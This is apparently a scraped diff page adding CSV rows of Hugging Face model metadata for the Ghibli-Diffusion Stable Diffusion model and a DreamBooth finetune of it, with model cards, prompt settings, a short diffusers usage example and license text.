---","{""id"": ""LuoKinging/learning-1"", ""author"": ""LuoKinging"", ""sha"": ""95d7d747c5aaee257334501b82f296469a8f4d9b"", ""last_modified"": ""2024-10-13 16:47:55+00:00"", ""created_at"": ""2024-10-13 16:26:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""allennlp"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""allennlp"", ""test"", ""luoking"", ""token-classification"", ""zh"", ""dataset:argilla/FinePersonas-v0.1"", ""base_model:stepfun-ai/GOT-OCR2_0"", ""base_model:finetune:stepfun-ai/GOT-OCR2_0"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""token-classification"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\ndatasets:\n- argilla/FinePersonas-v0.1\nlanguage:\n- zh\nlibrary_name: allennlp\nlicense: mit\nmetrics:\n- accuracy\npipeline_tag: token-classification\ntags:\n- test\n- luoking\nnew_version: black-forest-labs/FLUX.1-dev"", ""widget_data"": [{""text"": ""\u6211\u53eb\u6c83\u5c14\u592b\u5188\uff0c\u6211\u4f4f\u5728\u67cf\u6797\u3002""}, {""text"": ""\u6211\u53eb\u8428\u62c9\uff0c\u6211\u4f4f\u5728\u4f26\u6566\u3002""}, {""text"": ""\u6211\u53eb\u514b\u62c9\u62c9\uff0c\u6211\u4f4f\u5728\u52a0\u5dde\u4f2f\u514b\u5229\u3002""}], ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-13 16:47:55+00:00"", ""cardData"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\ndatasets:\n- argilla/FinePersonas-v0.1\nlanguage:\n- zh\nlibrary_name: allennlp\nlicense: mit\nmetrics:\n- accuracy\npipeline_tag: token-classification\ntags:\n- test\n- luoking\nnew_version: black-forest-labs/FLUX.1-dev"", ""transformersInfo"": null, ""_id"": ""670bf4c4e3d216b424a0e31a"", ""modelId"": ""LuoKinging/learning-1"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=LuoKinging/learning-1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BLuoKinging%2Flearning-1%5D(%2FLuoKinging%2Flearning-1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
Ghibli-Diffusion_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
@@ -0,0 +1,99 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
nitrosocke/Ghibli-Diffusion,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
license: creativeml-openrail-m
|
| 6 |
+
thumbnail: ""https://huggingface.co/nitrosocke/Ghibli-Diffusion/resolve/main/images/ghibli-diffusion-thumbnail.jpg""
|
| 7 |
+
tags:
|
| 8 |
+
- stable-diffusion
|
| 9 |
+
- text-to-image
|
| 10 |
+
- image-to-image
|
| 11 |
+
- diffusers
|
| 12 |
+
|
| 13 |
+
---
|
| 14 |
+
### Ghibli Diffusion
|
| 15 |
+
|
| 16 |
+
This is the fine-tuned Stable Diffusion model trained on images from modern anime feature films from Studio Ghibli.
|
| 17 |
+
Use the tokens **_ghibli style_** in your prompts for the effect.
|
| 18 |
+
|
| 19 |
+
**If you enjoy my work and want to test new models before release, please consider supporting me**
|
| 20 |
+
[](https://patreon.com/user?u=79196446)
|
| 21 |
+
|
| 22 |
+
**Characters rendered with the model:**
|
| 23 |
+

|
| 24 |
+
**Cars and Animals rendered with the model:**
|
| 25 |
+

|
| 26 |
+
**Landscapes rendered with the model:**
|
| 27 |
+

|
| 28 |
+
_ghibli style beautiful Caribbean beach tropical (sunset) - Negative prompt: soft blurry_
|
| 29 |
+

|
| 30 |
+
_ghibli style ice field white mountains ((northern lights)) starry sky low horizon - Negative prompt: soft blurry_
|
| 31 |
+
|
| 32 |
+
#### Prompt and settings for the Strom Trooper:
|
| 33 |
+
**ghibli style (storm trooper) Negative prompt: (bad anatomy)**
|
| 34 |
+
_Steps: 20, Sampler: DPM++ 2M Karras, CFG scale: 7, Seed: 3450349066, Size: 512x704_
|
| 35 |
+
|
| 36 |
+
#### Prompt and settings for the VW Beetle:
|
| 37 |
+
**ghibli style VW beetle Negative prompt: soft blurry**
|
| 38 |
+
_Steps: 30, Sampler: Euler a, CFG scale: 7, Seed: 1529856912, Size: 704x512_
|
| 39 |
+
|
| 40 |
+
This model was trained using the diffusers based dreambooth training by ShivamShrirao using prior-preservation loss and the _train-text-encoder_ flag in 15.000 steps.
|
| 41 |
+
|
| 42 |
+
<!-- ### Gradio
|
| 43 |
+
|
| 44 |
+
We support a [Gradio](https://github.com/gradio-app/gradio) Web UI run redshift-diffusion:
|
| 45 |
+
[](https://huggingface.co/spaces/nitrosocke/Ghibli-Diffusion-Demo)-->
|
| 46 |
+
|
| 47 |
+
### 🧨 Diffusers
|
| 48 |
+
|
| 49 |
+
This model can be used just like any other Stable Diffusion model. For more information,
|
| 50 |
+
please have a look at the [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion).
|
| 51 |
+
|
| 52 |
+
You can also export the model to [ONNX](https://huggingface.co/docs/diffusers/optimization/onnx), [MPS](https://huggingface.co/docs/diffusers/optimization/mps) and/or [FLAX/JAX]().
|
| 53 |
+
|
| 54 |
+
```python
|
| 55 |
+
from diffusers import StableDiffusionPipeline
|
| 56 |
+
import torch
|
| 57 |
+
|
| 58 |
+
model_id = ""nitrosocke/Ghibli-Diffusion""
|
| 59 |
+
pipe = StableDiffusionPipeline.from_pretrained(model_id, torch_dtype=torch.float16)
|
| 60 |
+
pipe = pipe.to(""cuda"")
|
| 61 |
+
|
| 62 |
+
prompt = ""ghibli style magical princess with golden hair""
|
| 63 |
+
image = pipe(prompt).images[0]
|
| 64 |
+
|
| 65 |
+
image.save(""./magical_princess.png"")
|
| 66 |
+
```
|
| 67 |
+
|
| 68 |
+
## License
|
| 69 |
+
|
| 70 |
+
This model is open access and available to all, with a CreativeML OpenRAIL-M license further specifying rights and usage.
|
| 71 |
+
The CreativeML OpenRAIL License specifies:
|
| 72 |
+
|
| 73 |
+
1. You can't use the model to deliberately produce nor share illegal or harmful outputs or content
|
| 74 |
+
2. The authors claims no rights on the outputs you generate, you are free to use them and are accountable for their use which must not go against the provisions set in the license
|
| 75 |
+
3. You may re-distribute the weights and use the model commercially and/or as a service. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully)
|
| 76 |
+
[Please read the full license here](https://huggingface.co/spaces/CompVis/stable-diffusion-license)","{""id"": ""nitrosocke/Ghibli-Diffusion"", ""author"": ""nitrosocke"", ""sha"": ""7600fd7538c9030fb60fa7bca17bf048c86466b3"", ""last_modified"": ""2023-08-03 19:46:59+00:00"", ""created_at"": ""2022-11-18 15:50:51+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 122591, ""downloads_all_time"": null, ""likes"": 760, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""safetensors"", ""stable-diffusion"", ""text-to-image"", ""image-to-image"", ""en"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- image-to-image\n- diffusers\nthumbnail: https://huggingface.co/nitrosocke/Ghibli-Diffusion/resolve/main/images/ghibli-diffusion-thumbnail.jpg"", ""widget_data"": null, ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='feature_extractor/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ghibli-diffusion-v1.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-01s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-02s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-03s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-04s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-thumbnail.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/test.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [""radames/Real-Time-Latent-Consistency-Model"", ""Yntec/ToyWorld"", ""radames/Real-Time-Latent-Consistency-Model-Text-To-Image"", ""r3gm/DiffuseCraft"", ""John6666/DiffuseCraftMod"", ""Yntec/PrintingPress"", ""radames/Real-Time-SD-Turbo"", ""radames/real-time-pix2pix-turbo"", ""John6666/votepurchase-multiple-model"", ""latent-consistency/Real-Time-LCM-ControlNet-Lora-SD1.5"", ""Nymbo/image_gen_supaqueue"", ""ennov8ion/3dart-Models"", ""fffiloni/ControlVideo"", ""phenixrhyder/NSFW-ToyWorld"", ""Yntec/blitz_diffusion"", ""sanaweb/text-to-image"", ""Vedits/6x_Image_diffusion"", ""John6666/Diffusion80XX4sg"", ""ennov8ion/comicbook-models"", ""John6666/PrintingPress4"", ""SUPERSHANKY/Finetuned_Diffusion_Max"", ""PeepDaSlan9/B2BMGMT_Diffusion60XX"", ""latent-consistency/Real-Time-LCM-Text-to-Image-Lora-SD1.5"", ""Daniela-C/6x_Image_diffusion"", ""phenixrhyder/PrintingPress"", ""John6666/hfd_test_nostopbutton"", ""allknowingroger/Image-Models-Test59"", ""Menyu/DiffuseCraftMod"", ""daniissac/ghibli"", ""mindtube/Diffusion50XX"", ""TheKitten/Fast-Images-Creature"", ""Nymbo/Diffusion80XX4sg"", ""kaleidoskop-hug/PrintingPress"", ""ennov8ion/stablediffusion-models"", ""John6666/ToyWorld4"", ""grzegorz2047/fast_diffusion"", ""Alfasign/dIFFU"", ""Nymbo/PrintingPress"", ""Rifd/Sdallmodels"", ""John6666/Diffusion80XX4g"", ""NativeAngels/HuggingfaceDiffusion"", ""IgorSense/Diffusion_Space2"", ""ennov8ion/Scifi-Models"", ""ennov8ion/semirealistic-models"", ""ennov8ion/FantasyArt-Models"", ""ennov8ion/dreamlike-models"", ""noes14155/img_All_models"", ""ennov8ion/500models"", ""AnimeStudio/anime-models"", ""John6666/Diffusion80XX4"", ""K00B404/HuggingfaceDiffusion_custom"", ""John6666/blitz_diffusion4"", ""John6666/blitz_diffusion_builtin"", ""bobber/DiffuseCraft"", ""chrisjayden/gh-diffusion"", ""akhaliq/Ghibli-Diffusion"", ""RhythmRemix14/PrintingPressDx"", ""sohoso/PrintingPress"", ""NativeAngels/ToyWorld"", ""Lwight/Ghibli-Diffusion"", ""Harshveer/Finetuned_Diffusion_Max"", ""mindtube/maximum_multiplier_places"", ""animeartstudio/AnimeArtmodels2"", ""animeartstudio/AnimeModels"", ""Yabo/ControlVideo"", ""Binettebob22/fast_diffusion2"", ""pikto/Elite-Scifi-Models"", ""PeepDaSlan9/B2BMGMT_nitrosocke-Ghibli-Diffusion"", ""PixelistStudio/3dart-Models"", ""devmiles/zexxiai"", ""Nymbo/Diffusion60XX"", ""multimodalart/Real-Time-Latent-SDXL-Lightning"", ""TheKitten/Images"", ""ennov8ion/anime-models"", ""jordonpeter01/Diffusion70"", ""VirtuRoa/ghibli"", ""catontheturntable/Ghibli-Diffusion"", ""herberthe/nitrosocke-Ghibli-Diffusion"", ""RedYan/nitrosocke-Ghibli-Diffusion"", ""bradarrML/Diffusion_Space"", ""koustubhavachat/Ghibli-Diffusion"", ""ygtrfed/pp-web-ui"", ""Xinxiang0820/nitrosocke-Ghibli-Diffusion"", ""ivanmeyer/Finetuned_Diffusion_Max"", ""Mileena/Diffusion_Space2-Styles"", ""ennov8ion/Landscapes-models"", ""GorroRojo/nitrosocke-Ghibli-Diffusion"", ""Shad0ws/ImageModelTestEnvironment"", ""sohoso/anime348756"", ""ucmisanddisinfo/thisApp"", ""johann22/chat-diffusion"", ""afasdfas/cringe_model"", ""K00B404/generate_many_models"", ""manivannan7gp/Words2Image"", ""ennov8ion/art-models"", ""ennov8ion/photo-models"", ""ennov8ion/art-multi"", ""Festrcze/Real-Time-SD-Turbooooooo"", ""vih-v/x_mod"", ""John6666/testvp""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-08-03 19:46:59+00:00"", ""cardData"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- image-to-image\n- diffusers\nthumbnail: https://huggingface.co/nitrosocke/Ghibli-Diffusion/resolve/main/images/ghibli-diffusion-thumbnail.jpg"", ""transformersInfo"": null, ""_id"": ""6377a9dbf5fe4a39f7839d40"", ""modelId"": ""nitrosocke/Ghibli-Diffusion"", ""usedStorage"": 20376154998}",0,https://huggingface.co/elanoqi/wb-ghibli-800,1,,0,https://huggingface.co/RanaLLC/Ghibli-Diffusion-onnx-fp16,1,https://huggingface.co/Yntec/Ghibli,1,"CompVis/stable-diffusion-license, Daniela-C/6x_Image_diffusion, John6666/DiffuseCraftMod, John6666/Diffusion80XX4sg, John6666/PrintingPress4, John6666/votepurchase-multiple-model, Nymbo/image_gen_supaqueue, PeepDaSlan9/B2BMGMT_Diffusion60XX, Yntec/PrintingPress, Yntec/ToyWorld, Yntec/blitz_diffusion, huggingface/InferenceSupport/discussions/new?title=nitrosocke/Ghibli-Diffusion&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bnitrosocke%2FGhibli-Diffusion%5D(%2Fnitrosocke%2FGhibli-Diffusion)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, phenixrhyder/NSFW-ToyWorld, r3gm/DiffuseCraft",14
|
| 77 |
+
elanoqi/wb-ghibli-800,"
|
| 78 |
+
---
|
| 79 |
+
license: creativeml-openrail-m
|
| 80 |
+
base_model: nitrosocke/Ghibli-Diffusion
|
| 81 |
+
instance_prompt: a photo of jksj waist bag
|
| 82 |
+
tags:
|
| 83 |
+
- stable-diffusion
|
| 84 |
+
- stable-diffusion-diffusers
|
| 85 |
+
- text-to-image
|
| 86 |
+
- diffusers
|
| 87 |
+
- dreambooth
|
| 88 |
+
inference: true
|
| 89 |
+
---
|
| 90 |
+
|
| 91 |
+
# DreamBooth - elanoqi/wb-ghibli-800
|
| 92 |
+
|
| 93 |
+
This is a dreambooth model derived from nitrosocke/Ghibli-Diffusion. The weights were trained on a photo of jksj waist bag using [DreamBooth](https://dreambooth.github.io/).
|
| 94 |
+
You can find some example images in the following.
|
| 95 |
+
|
| 96 |
+
|
| 97 |
+
|
| 98 |
+
DreamBooth for the text encoder was enabled: False.
|
| 99 |
+
","{""id"": ""elanoqi/wb-ghibli-800"", ""author"": ""elanoqi"", ""sha"": ""d3daf31284f473d7cd9bc1fa78bdcd1c91c2fdef"", ""last_modified"": ""2023-10-11 09:48:59+00:00"", ""created_at"": ""2023-10-11 08:21:53+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 8, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""tensorboard"", ""safetensors"", ""stable-diffusion"", ""stable-diffusion-diffusers"", ""text-to-image"", ""dreambooth"", ""base_model:nitrosocke/Ghibli-Diffusion"", ""base_model:finetune:nitrosocke/Ghibli-Diffusion"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: nitrosocke/Ghibli-Diffusion\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\n- dreambooth\ninstance_prompt: a photo of jksj waist bag\ninference: true"", ""widget_data"": null, ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/optimizer.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/random_states_0.pkl', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/scheduler.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/unet/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='feature_extractor/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='logs/dreambooth/1697015792.502247/events.out.tfevents.1697015792.fd068d4ea563.890.1', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='logs/dreambooth/1697015792.5039868/hparams.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='logs/dreambooth/events.out.tfevents.1697015792.fd068d4ea563.890.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-10-11 09:48:59+00:00"", ""cardData"": ""base_model: nitrosocke/Ghibli-Diffusion\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\n- dreambooth\ninstance_prompt: a photo of jksj waist bag\ninference: true"", ""transformersInfo"": null, ""_id"": ""65265b21d5a9686516d90167"", ""modelId"": ""elanoqi/wb-ghibli-800"", ""usedStorage"": 10644418147}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=elanoqi/wb-ghibli-800&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Belanoqi%2Fwb-ghibli-800%5D(%2Felanoqi%2Fwb-ghibli-800)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
InternVL-Chat-V1-5_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
@@ -0,0 +1,655 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
